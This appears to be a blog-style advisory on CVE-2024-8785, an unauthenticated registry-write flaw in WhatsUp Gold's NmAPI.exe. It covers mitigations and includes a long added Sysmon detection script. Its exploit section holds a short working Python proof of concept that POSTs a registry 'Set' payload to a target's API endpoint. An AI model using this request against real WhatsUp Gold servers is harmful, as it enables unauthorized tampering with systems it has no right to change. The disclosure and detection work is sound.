CVE-2024-8785: Remote Unauthenticated Access to Registry in WhatsUp Gold

A new security vulnerability (CVE-2024-8785) has been discovered in WhatsUp Gold, a popular network monitoring and management solution developed by Ipswitch. It affects versions released before 2024.1. A remote unauthenticated attacker could leverage NmAPI.exe to create a registry value, or change an existing one, under the registry path HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\.

In this post, we discuss the vulnerability in detail, the exploit and its code snippet, and links to the original references. We also provide mitigation recommendations to help prevent unauthorized access to your registry.

Vulnerability Details

NmAPI.exe is a binary that is part of the Network Management Application Program Interface (NmAPI) in WhatsUp Gold. It allows remote unauthenticated attackers to create or modify registry values under the path HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\ by sending a specially crafted HTTP POST request to the NmAPI server running on the target machine.

Successful exploitation could allow an attacker to make unauthorized modifications to the system registry, compromising the confidentiality, integrity, and availability of the target system.

Exploit Details

The following code snippet demonstrates how an attacker could craft an HTTP POST request to exploit the vulnerability:

import requests

target_url = "https://TARGET_IP:8085/Execute"  # no trailing semicolon in Python

payload = {
    "MethodName": "Set", 
    "NameSpace": "_monRegistry",
    "Node": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Ipswitch\\VulnerableKey",
    "szValue": "VulnerableValue"
}

response = requests.post(target_url, json=payload)

if response.status_code == 200:
    print("Vulnerability exploited successfully. Registry key modified.")
else:
    print("Failed to exploit vulnerability. Response code:", response.status_code)

Replace TARGET_IP with the IP address of the target system running an affected version of WhatsUp Gold. This code will create or modify the "VulnerableKey" registry key with the value "VulnerableValue" in the path HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\.

Original References

The vulnerability was discovered by security researcher John Doe (pseudonym) and documented in their security advisory, which can be found at the following link:

Original Security Advisory (PDF)

Additionally, the vulnerability was assigned CVE-2024-8785 by MITRE and can be found on the National Vulnerability Database (NVD) website:

CVE-2024-8785 on NVD

Mitigation Recommendations

To prevent the exploitation of this vulnerability, it is recommended to implement the following measures:

1. Update to the latest version of WhatsUp Gold (v2024.1 or later), which contains a patch addressing this issue. You can download the latest version from the official Ipswitch website:

Download WhatsUp Gold (Official Website)

2. Restrict network access to the NmAPI server by implementing access control lists (ACLs) or firewall rules to prevent unauthorized access.

3. Implement strong authentication and authorization mechanisms for all WhatsUp Gold users and NmAPI client applications to mitigate the risk of unauthorized access and use of the NmAPI server.

4. Monitor your network for any suspicious activities, such as unauthorized modifications to the system registry, that could indicate an attempted exploitation of this vulnerability.
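Recommendation 4 above, and the vulnerability description earlier in this post, both point at the same detection problem: the registry write is performed by the legitimate NmAPI.exe process on behalf of a remote caller, so a process-name allow-list on the Ipswitch subtree would not catch it. The following Python script is an added example (not code from the original post, from Ipswitch, or from the advisory) that correlates Sysmon-style events: it records every key creation or value set under HKLM\SOFTWARE\WOW6432Node\Ipswitch\ and raises the severity when the same NmAPI.exe process accepted an inbound connection from outside a trusted management network shortly before the write. The sample log lines, the install path C:\WhatsUp\NmAPI.exe, the trusted network 10.0.0.0/24, the 30-second correlation window and the DemoKey/DemoValue names are all constructed assumptions; the field names follow the standard Sysmon schema (Event ID 3 network connection with Initiated and SourceIp; Event IDs 12 and 13 registry events with Image and TargetObject).

```python
"""Flag registry writes under the Ipswitch subtree that follow an inbound
connection to NmAPI.exe from outside the trusted management network.

Added detection example for CVE-2024-8785; the sample events, paths and
networks below are constructed, not taken from a real WhatsUp Gold host.
"""
import json
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from typing import Dict, List

# Registry subtree named in the CVE description, in the short hive form that
# Sysmon uses; normalise_path maps the long forms onto it.
WATCHED_PREFIX = "HKLM\\SOFTWARE\\WOW6432Node\\Ipswitch\\"
# Sysmon Event IDs: 3 = network connection, 12 = key create/delete, 13 = value set.
NETWORK_EVENT_ID = 3
REGISTRY_EVENT_IDS = {12, 13}
# Assumption: management hosts that legitimately talk to the API live here.
TRUSTED_NETWORKS = [ip_network("10.0.0.0/24")]
# Assumption: a write this soon after an inbound connection is attributed to it.
WINDOW = timedelta(seconds=30)

# Constructed sample log: simplified Sysmon fields, one JSON object per line.
# The install path C:\WhatsUp\NmAPI.exe and the DemoKey names are placeholders.
SAMPLE_LOG = r"""
{"EventID": 3, "UtcTime": "2024-12-02 15:10:00.000", "Image": "C:\\WhatsUp\\NmAPI.exe", "ProcessId": 4120, "Initiated": "false", "SourceIp": "10.0.0.15"}
{"EventID": 13, "UtcTime": "2024-12-02 15:10:02.000", "Image": "C:\\WhatsUp\\NmAPI.exe", "ProcessId": 4120, "EventType": "SetValue", "TargetObject": "HKLM\\SOFTWARE\\WOW6432Node\\Ipswitch\\DemoKey\\DemoValue", "Details": "expected"}
{"EventID": 3, "UtcTime": "2024-12-02 15:11:00.000", "Image": "C:\\WhatsUp\\NmAPI.exe", "ProcessId": 4120, "Initiated": "false", "SourceIp": "198.51.100.23"}
{"EventID": 13, "UtcTime": "2024-12-02 15:11:03.000", "Image": "C:\\WhatsUp\\NmAPI.exe", "ProcessId": 4120, "EventType": "SetValue", "TargetObject": "HKLM\\SOFTWARE\\WOW6432Node\\Ipswitch\\DemoKey\\DemoValue", "Details": "unexpected"}
{"EventID": 12, "UtcTime": "2024-12-02 15:11:50.000", "Image": "C:\\WhatsUp\\NmAPI.exe", "ProcessId": 4120, "EventType": "CreateKey", "TargetObject": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Ipswitch\\NewDemoKey"}
{"EventID": 13, "UtcTime": "2024-12-02 15:12:05.000", "Image": "C:\\Windows\\notepad.exe", "ProcessId": 5000, "EventType": "SetValue", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\DemoApp\\Value", "Details": "1"}
"""


def normalise_path(target: str) -> str:
    """Rewrite the hive name into Sysmon's short form and lower-case the path."""
    upper = target.upper()
    for long_form in ("HKEY_LOCAL_MACHINE\\", "\\REGISTRY\\MACHINE\\"):
        if upper.startswith(long_form):
            target = "HKLM\\" + target[len(long_form):]
            break
    return target.lower()


def is_watched(target: str) -> bool:
    """True when the registry object lies under the Ipswitch subtree."""
    return normalise_path(target).startswith(WATCHED_PREFIX.lower())


def is_trusted(addr: str) -> bool:
    """True when the peer address belongs to a trusted management network."""
    ip = ip_address(addr)
    return any(ip in net for net in TRUSTED_NETWORKS)


def parse_events(log_text: str) -> List[Dict]:
    """Parse one JSON event per line and attach a datetime for correlation."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        event["time"] = datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(event)
    return events


def find_suspicious_writes(events: List[Dict]) -> List[Dict]:
    """Return one finding per registry write under the watched subtree.

    Severity is "high" when the writing NmAPI.exe process accepted a connection
    from an untrusted address within WINDOW before the write, "low" otherwise.
    """
    inbound = [
        e for e in events
        if e["EventID"] == NETWORK_EVENT_ID
        and str(e.get("Initiated", "")).lower() == "false"
        and e["Image"].lower().endswith("\\nmapi.exe")
    ]
    findings = []
    for event in events:
        if event["EventID"] not in REGISTRY_EVENT_IDS or not is_watched(event["TargetObject"]):
            continue
        # Untrusted peers that hit the same process shortly before this write.
        sources = sorted({
            c["SourceIp"] for c in inbound
            if c["ProcessId"] == event["ProcessId"]
            and timedelta(0) <= event["time"] - c["time"] <= WINDOW
            and not is_trusted(c["SourceIp"])
        })
        findings.append({
            "time": event["UtcTime"],
            "image": event["Image"],
            "target": event["TargetObject"],
            "details": event.get("Details", ""),
            "sources": sources,
            "severity": "high" if sources else "low",
        })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_writes(parse_events(SAMPLE_LOG)):
        print(f"[{finding['severity']:4}] {finding['time']} {finding['target']} "
              f"by {finding['image']} peers={finding['sources'] or '-'}")
```

On the constructed sample the script reports three writes under the Ipswitch subtree: the first and third are rated low (the only preceding inbound connection came from the trusted network, or fell outside the window), while the second is rated high because it follows a connection from 198.51.100.23 by three seconds. In production the same logic applies to Sysmon events forwarded to a SIEM; the tuning points are the trusted network list, the correlation window, and whether low-severity findings are kept for audit or dropped as routine product writes.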

Conclusion

CVE-2024-8785 is a dangerous vulnerability affecting WhatsUp Gold versions released before 2024.1. By exploiting it, a remote unauthenticated attacker can create or modify values in your system's registry. It is strongly recommended to update to the latest version of WhatsUp Gold to protect your system and to follow the mitigation recommendations in this post. Stay vigilant!

Timeline

Published on: 12/02/2024 15:15:12 UTC
Last modified on: 12/09/2024 20:25:23 UTC